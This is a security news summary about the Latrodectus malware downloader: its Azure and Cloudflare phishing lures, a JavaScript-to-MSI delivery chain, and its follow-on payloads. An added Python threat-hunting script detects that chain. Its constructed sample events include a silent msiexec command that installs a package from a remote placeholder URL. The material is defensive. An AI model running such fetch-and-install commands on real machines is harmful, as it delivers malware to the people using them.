April 30, 2024 at 06:15PM
The Latrodectus malware is being distributed through phishing emails that use Microsoft Azure and Cloudflare lures to appear legitimate and evade security software. This Windows malware downloader, linked to the IcedID developers, is increasingly delivered through phishing campaigns and contact form spam to gain initial access to corporate networks. An infection can lead to further malware being dropped, so an infected system should be evaluated immediately.
Key Takeaways from the Meeting Notes:
1. Latrodectus malware is being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate and evade email security platforms.
2. It acts as a backdoor, downloading additional EXE and DLL payloads or executing commands, and it is increasingly being used in phishing campaigns and contact form spam to gain initial access to corporate networks.
3. The malware is linked to the developers of the IcedID modular malware loader, and it is being distributed through reply-chain phishing emails that use PDF attachments or embedded URLs to start the attack.
4. The PDFs use generic names and pretend to be documents hosted in Microsoft Azure cloud storage; the link leads to a fake Cloudflare security check (captcha) that stops security software from easily following the attack chain automatically.
5. When the correct answer is entered into the fake Cloudflare captcha, a JavaScript file is downloaded, which then downloads an MSI file from a hardcoded URL.
6. Upon installation, the MSI file drops a DLL, which is the Latrodectus malware, and it quietly runs in the background waiting for payloads to install or commands to execute.
7. The malware has been observed dropping the Lumma information-stealer and Danabot, and it could be used to deliver a wider range of payloads in the future, such as Cobalt Strike, and to support partnerships with ransomware gangs.
8. If a device becomes infected with Latrodectus, it is critical to disconnect it from the network as soon as possible and examine the network for unusual behavior, since the initial infection is typically followed by further payloads.
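The delivery chain in items 5 and 6 (a downloaded JavaScript file that fetches an MSI from a hardcoded URL, which then drops the DLL) leaves a characteristic process-creation trail that defenders can hunt for. The following script is an added example, not code from the original article or from the researchers it summarizes. It assumes process-creation events in the shape of Sysmon Event ID 1 (image, parent image, command line) and that the JavaScript file runs under a Windows script host (wscript.exe or cscript.exe) that launches msiexec.exe with a remote package URL; both the telemetry shape and the sample events are constructed for illustration and are not published indicators.

```python
"""
Hunt for a JS-downloader -> remote-MSI delivery chain in process-creation events.

Assumptions (not stated on the page):
  * events resemble Sysmon Event ID 1: image, parent image, command line, pids;
  * the JavaScript stage runs under wscript.exe/cscript.exe and spawns msiexec.exe
    pointed at an http(s) URL, which msiexec accepts as a package source.
The sample events below are constructed for this example, not real telemetry.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLER = "msiexec.exe"
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SILENT_RE = re.compile(r"/q[nb]?\b|/quiet", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the new process
    cmdline: str
    parent_image: str  # full path of the parent process


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_js_downloader(e: ProcEvent) -> bool:
    """Script host executing a .js file (the downloaded JavaScript stage)."""
    return basename(e.image) in SCRIPT_HOSTS and re.search(r"\.js\b", e.cmdline, re.I) is not None


def is_msi_from_url(e: ProcEvent) -> bool:
    """msiexec handed a remote package (the MSI fetched from a hardcoded URL)."""
    return basename(e.image) == INSTALLER and URL_RE.search(e.cmdline) is not None


def hunt(events):
    """Score every msiexec-from-URL event; the score rises when the parent is a
    script host running a .js file and when a silent-install switch is present."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not is_msi_from_url(e):
            continue
        url = URL_RE.search(e.cmdline).group(0)
        reasons = [f"msiexec fetching remote package {url}"]
        score = 1
        parent = by_pid.get(e.ppid)
        if parent is not None and is_js_downloader(parent):
            score += 1
            reasons.append(f"spawned by {basename(parent.image)} running: {parent.cmdline}")
        if SILENT_RE.search(e.cmdline):
            score += 1
            reasons.append("silent install switch")
        findings.append({"pid": e.pid, "score": score, "url": url, "reasons": reasons})
    return findings


# Constructed sample: a benign local MSI install (pid 400) and the suspicious chain
# explorer -> wscript running a .js lure -> msiexec installing from a URL (pid 300).
SAMPLE_EVENTS = [
    ProcEvent(100, 50, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\userinit.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\Document_2024.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://example.invalid/pkg/update.msi /qn",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(400, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\u\Downloads\7zip.msi"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid {f['pid']} score {f['score']}: " + "; ".join(f["reasons"]))
```

The local 7zip.msi install is never flagged because msiexec is only scored when it is given a remote package; the lure chain scores 3 because the remote URL, the script-host parent, and the `/qn` switch all line up, which is what separates this pattern from ordinary software deployment on the same host.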